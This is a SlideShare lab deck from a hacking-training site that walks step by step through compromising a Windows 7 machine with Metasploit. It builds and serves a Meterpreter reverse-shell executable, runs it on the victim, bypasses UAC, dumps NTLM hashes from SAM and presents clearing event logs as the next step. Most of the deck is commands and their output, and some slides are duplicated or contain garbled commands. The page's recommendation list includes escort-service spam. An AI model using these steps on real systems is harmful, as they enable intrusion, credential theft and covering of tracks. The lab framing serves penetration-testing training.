SlideShare a Scribd company logo

Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit

Vishal Kumar
Vishal Kumar

This Document will show you how get the privileges through exploiting the vulnerabilities using the Metasploit in Kali Linux. this will help a pen-tester to examine the security level of a system.

Internet
1 of 17
Download to read offline
1 WWW.Prohackers.in Lab-4 “Privileges Esclation by Exploiting Client Side Vulnerabilities using Metasploit” By: -Vishal Kumar (CEH, CHFI, CISE, MCP) info@prohackers.in
2 WWW.Prohackers.in Table of content 1. Lab Scenario 2. Lab Objective 3. Overview of Lab 4. Lab Tasks 3.1 Task 01 :- Start postgresql and metasploit services 3.2 Task 02 : - Share Exploit.exe file 3.3 Task 03 : - Perform Exploitation 3.4 Task 04 : - Run the Exploit 3.4 Task 05 : - Establish a session
3 WWW.Prohackers.in Task 01:- Start postgresql and metasploit services.
4 WWW.Prohackers.in Note:- before performing this lab, log in to Kali-Linux virtual machine, click places → Computer. Navigate to File System → etc → apache2, open apache2.conf, enter the command servername localhost in a new line and save the file.  Launch window 7 and login to its administrator account.  Switch to Kali-Linux virtual machine and log in to it. Launch a command terminal, and type the command service postgresql start and press Enter. Now, type the other command service metasploit start and press Enter.  ype the command msfconsole and press Enter to launch msfconsole.  Type the command msfpayload windows/meterpreter/reverse_tcp LHOST=(IP of Kali-Linux) X > Desktop/Exploit.exe in msfconsole, and press Enter.
5 WWW.Prohackers.in Tip: - Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The above command will create a Windows executable file named “Exploit.exe” and will be saved in Kali-Linux Desktop. Task 02:- Share Exploit.exe file.
6 WWW.Prohackers.in  Now you need to share Exploit.exe with the victim machine (in this lab we are using Windows 7 virtual machine as a victim machine). Open a new command line terminal, type the command mkdir /var/www/share and press Enter to create a new directory named Share. Tip: - To create a new directory share in www folder, following command is used: mkdir /var/www/share.  Change the mode of the share folder to 755 by typing the command chmode -R 755 /var/www/share and press Enter Tip: - To change the mode of a share directory/folder, use the following command: chmode -R 755 /var/www/share/.  Change the ownership of that folder to www-data, by typing the command chown - R www-data:www-data /var/www/share/ and press Enter. Tip: - To change the ownership of folder into www, use the following command: chown -R www-data /var/www/share/.  Type the command ls -la /var/www/ | grep share and press Enter
7 WWW.Prohackers.in  The next step is to start the apache server. Type the command service apache2 start in terminal and press Enter.  Now, that the apache web server is running, copy Exploit.exe into the share folder. Type the command cp /root/Desktop/Exploit.exe /var/www/share/ in the terminal, and press Enter Note:- To run the apache web server, use the following command: cp/root/.msf4/data/exploits/*/var/www/share/. Task 03:- Perform Exploitation.  Switch back to msfconsole terminal to create a handler. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework.  Now, issue the following commands: o Type set payload windows/meterpreter/reverse_tcp and press Enter. Type set LHOST x.x.x.x (Kali-Linux IP address) and press Enter.
8 WWW.Prohackers.in  To start handler type the command: exploit -j -z and press Enter. Task 04:- Run the Exploit.  Now, switch to windows 7 virtual machine.  Launch web browser, and type the URL http://192.168.121.129/share/ in the address bar and press Enter  You will be redirected to the apache index webpage. Click Exploit.exe link to download the backdoor file  The opening Exploit.exe pop-up appears, click Save File.  On completion of the download, a download notification appears in the browser. Click the Open Containing Folder icon. Tip:- To interact with the available session, you can use session -i <session_ID>.
9 WWW.Prohackers.in  Double-click Exploit.exe. If an open file - security warning appears, click Run.  Switch back to Kali-Linux machine. Meterpreter session has been successfully opened, as shown in the following screenshot. Task 05:- Establish a session. Type session -i 1 and press Enter. (1 in session -i 1 command is the ID number of the session ). Meterpreter shell is launched, as shown in the following screenshot.  Type getuid and press Enter. This displays the current user ID, as shown in the screenshot
10 WWW.Prohackers.in  You will observe that the Meterpreter server is running with normal user privileges.  You will not be able to execute the commands (such as run hashdump, which dumps the user account hashes located in the SAM file; clearev, which clear the event logs remotely; etc.) that require administrative. Root privileges.  Let us check this by using run hashdump command.  The command fails to dump the hashes from the SAM file located in the windows 7 and returns an error stating that access is denied.  From this, it is evident that Meterpreter server requires admin privileges to perform such actions.  Now, we shall try to escalate the privileges by issuing getsystem command that attempts to elevate the user privileges.  The command issued is: o Getsystem -t 1: which use the Service - Named Pipe Impersonation (In Memory/Admin) Technique?  The command fails to escalate privileges and return an error stating Access is Denied.
11 WWW.Prohackers.in  From the above result, it is evident that the security configuration of the Windows 7 machine is blocking you from gaining unrestricted access to it.  Now, we shall try to bypass the user account control setting that is blocking you. You will now: o Background the current meterpreter session, o Use the bypassuac exploit for windows, o Set meterpreter/reverse_tcp payload, o Configure the exploit and payload, o Exploit the machine using the above configuration payload in attempt to elevate the privileges.  Type background and press Enter. This command background the current meterpreter session  Type use exploit/windows/local/bypassuac and press Enter. Here you need to configure the exploit. To know what all options you need to configuration in the exploit, type show options and press Enter  The Module options section appears, displaying the requirements for the exploit. You will observe that:
12 WWW.Prohackers.in o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option.  Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter  Now, that we have configured the exploit, our next step will be to set a payload and configure it.  Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload.  The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter.
13 WWW.Prohackers.in  The Module options section appears, displaying the requirements for the exploit. You will observe that: o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option.  Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter
14 WWW.Prohackers.in  Now, that we have configured the exploit, our next step will be to set a payload and configure it.  Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload.  The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter
15 WWW.Prohackers.in  The Module options section appears, displaying the previously configured exploit. Here you can observe that the session value is set.  The Payload options sections displays the requirement for the payload. Observe that: o LHOST option is required, but the current setting is empty, here you need to set the IP address of the local host i.e. Kali-Linux ip address. o EXITFUNC option is required but the current setting is already set to precess, so ignore this options. o LPORT option is required, but the current setting is already set to port number 4444, so ignore this option.  To set the LHOST option, type set LHOST 192.168.121.129 and press Enter.  You have successfully configured the exploit and payload. Type exploit and press Enter. This begins to exploit the UAC settings in windows 7 machine.  As you can see, BypassUAC exploit has successfully bypass the UAC settings on windows 7 machine; you have now successfully attained a meterpreter session.  Now, let us check the current User ID statue of meterpreter. You will observe that Meterpreter server is still running with normal user privileges. Type getuid and press Enter.
16 WWW.Prohackers.in  Let us check if we have successfully attained the SYSTEM/admin privileges by issuing a meterpreter command that require these privileges in order to be executed.  For instance, we shall try to obtain hashes located in SAM file of windows 7. Type the command run hashdump and press Enter, this time meterpreter successfully extracted the NTLM hashes and display them as shown in the following screenshot.  Thus you have successfully escalate the privileges by exploiting windows 7 machine’s vulnerability.  You can now execute commands (clearev, which clears the event logs remotely, etc) that require administrative/ root privileges
17 WWW.Prohackers.in Tool/Utility Information Collected/Objectives Achieved Metasploit Framework Console (msfconsole) IP Address Range/target:- Windows 7 machine Scan Result:-  Hacking windows 7.  Escalating the privileges.  Extracting the NTLM Hashes from the SAM file.  Clear the event log. Thanks for reading this presentation Please give us your feedback at info@prohackers.in Your feedback is most valuable for us for improving the presentation You can also suggest the topic on which you want the presentation Website: www.prohackers.in FB page: www.facebook.com/theprohackers2017 Join FB Group: www.facebook.com/groups/group.prohackers/ Watch us on: www.youtube.com//channel/UCcyYSi1sh1SmyMlGfB-Vq6A ***Thanks***

Recommended

Heap and stack space in java
Heap and stack space in javaHeap and stack space in java
Heap and stack space in javaTalha Ocakçı
 
brands that were awesome on reddit: 2013
brands that were awesome on reddit: 2013brands that were awesome on reddit: 2013
brands that were awesome on reddit: 2013Michael Cole
 
Access modifiers
Access modifiersAccess modifiers
Access modifiersJadavsejal
 
Interfaces .net
Interfaces .netInterfaces .net
Interfaces .netajeela mushtaq
 
Constructor and desturctor
Constructor and desturctorConstructor and desturctor
Constructor and desturctorSomnath Kulkarni
 
Mint pitch deck
Mint pitch deckMint pitch deck
Mint pitch deckTech in Asia
 
Method overriding
Method overridingMethod overriding
Method overridingAzaz Maverick
 
Currency Converter
Currency ConverterCurrency Converter
Currency ConverterAnika Nawar
 

Recommended

Heap and stack space in java
Heap and stack space in javaHeap and stack space in java
Heap and stack space in javaTalha Ocakçı
 
brands that were awesome on reddit: 2013
brands that were awesome on reddit: 2013brands that were awesome on reddit: 2013
brands that were awesome on reddit: 2013Michael Cole
 
Access modifiers
Access modifiersAccess modifiers
Access modifiersJadavsejal
 
Interfaces .net
Interfaces .netInterfaces .net
Interfaces .netajeela mushtaq
 
Constructor and desturctor
Constructor and desturctorConstructor and desturctor
Constructor and desturctorSomnath Kulkarni
 
Mint pitch deck
Mint pitch deckMint pitch deck
Mint pitch deckTech in Asia
 
Method overriding
Method overridingMethod overriding
Method overridingAzaz Maverick
 
Currency Converter
Currency ConverterCurrency Converter
Currency ConverterAnika Nawar
 
P3.docx
P3.docxP3.docx
P3.docxIsaacMwangi25
 
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_SlaveDay5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_SlaveSravanthi N
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows Boxguest34a3a419
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows BoxJayanta Dash
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7Nutan Kumar Panda
 
Jmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoringJmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoringPankaj Biswas
 
instaling
instalinginstaling
instalingtutorialsruby
 
instaling
instalinginstaling
instalingtutorialsruby
 
instaling
instalinginstaling
instalingtutorialsruby
 
instaling
instalinginstaling
instalingtutorialsruby
 
How To Make System Work Faster
How To Make System Work FasterHow To Make System Work Faster
How To Make System Work FasterGaurav bhatnagar
 
Training Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183xTraining Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183xAbdelilah CHARBOUB
 
18IF004_CNS.docx
18IF004_CNS.docx18IF004_CNS.docx
18IF004_CNS.docxRajAmbere1
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Installing Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu InstanceInstalling Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu Instancekamarul kawnayeen
 
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo ScriptManaging Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo ScriptMicrosoft TechNet
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackVishal Kumar
 
Troubleshooting guide for apache 2.2 service.
Troubleshooting guide for apache 2.2 service.Troubleshooting guide for apache 2.2 service.
Troubleshooting guide for apache 2.2 service.Wielbert Chouphen Collinson
 
Experimentos lab
Experimentos labExperimentos lab
Experimentos labGeorge Madson Dias Santos
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallVishal Kumar
 

More Related Content

Similar to Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit

Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_SlaveDay5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_SlaveSravanthi N
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows Boxguest34a3a419
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows BoxJayanta Dash
 
Jmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoringJmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoringPankaj Biswas
 
How To Make System Work Faster
How To Make System Work FasterHow To Make System Work Faster
How To Make System Work FasterGaurav bhatnagar
 
Training Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183xTraining Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183xAbdelilah CHARBOUB
 
18IF004_CNS.docx
18IF004_CNS.docx18IF004_CNS.docx
18IF004_CNS.docxRajAmbere1
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Installing Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu InstanceInstalling Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu Instancekamarul kawnayeen
 
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo ScriptManaging Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo ScriptMicrosoft TechNet
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackVishal Kumar
 

Similar to Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit (20)

P3.docx
P3.docxP3.docx
P3.docx
 
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_SlaveDay5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
Day5_Apache_JMeter_Test_Execution_RemoteMode_Master_Slave
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows Box
 
Mantis Installation for Windows Box
Mantis Installation for Windows BoxMantis Installation for Windows Box
Mantis Installation for Windows Box
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
Jmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoringJmeter memory profiling, server-side monitoring, memory and cpu monitoring
Jmeter memory profiling, server-side monitoring, memory and cpu monitoring
 
instaling
instalinginstaling
instaling
 
instaling
instalinginstaling
instaling
 
instaling
instalinginstaling
instaling
 
instaling
instalinginstaling
instaling
 
How To Make System Work Faster
How To Make System Work FasterHow To Make System Work Faster
How To Make System Work Faster
 
Training Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183xTraining Alcatel-Lucent WDM PSS 183x
Training Alcatel-Lucent WDM PSS 183x
 
18IF004_CNS.docx
18IF004_CNS.docx18IF004_CNS.docx
18IF004_CNS.docx
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
 
Installing Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu InstanceInstalling Lamp Stack on Ubuntu Instance
Installing Lamp Stack on Ubuntu Instance
 
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo ScriptManaging Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
Managing Web Infrastructure Systems with Windows PowerShell 2.0 Demo Script
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrack
 
Troubleshooting guide for apache 2.2 service.
Troubleshooting guide for apache 2.2 service.Troubleshooting guide for apache 2.2 service.
Troubleshooting guide for apache 2.2 service.
 
Experimentos lab
Experimentos labExperimentos lab
Experimentos lab
 

More from Vishal Kumar

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallVishal Kumar
 
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)Vishal Kumar
 
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolE-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolVishal Kumar
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Vishal Kumar
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)Vishal Kumar
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Vishal Kumar
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)Vishal Kumar
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationVishal Kumar
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht trackVishal Kumar
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterVishal Kumar
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utilityVishal Kumar
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hackingVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 

More from Vishal Kumar (19)

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About Firewall
 
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
 
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolE-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft Maalware
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web application
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht track
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvester
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utility
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hacking
 
Social engineering
Social engineeringSocial engineering
Social engineering
 
Social engineering
Social engineeringSocial engineering
Social engineering
 

Recently uploaded

Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Servicesexy call girls service in goa
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Roomdivyansh0kumar0
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls KolkataLow Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 

Recently uploaded (20)

Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
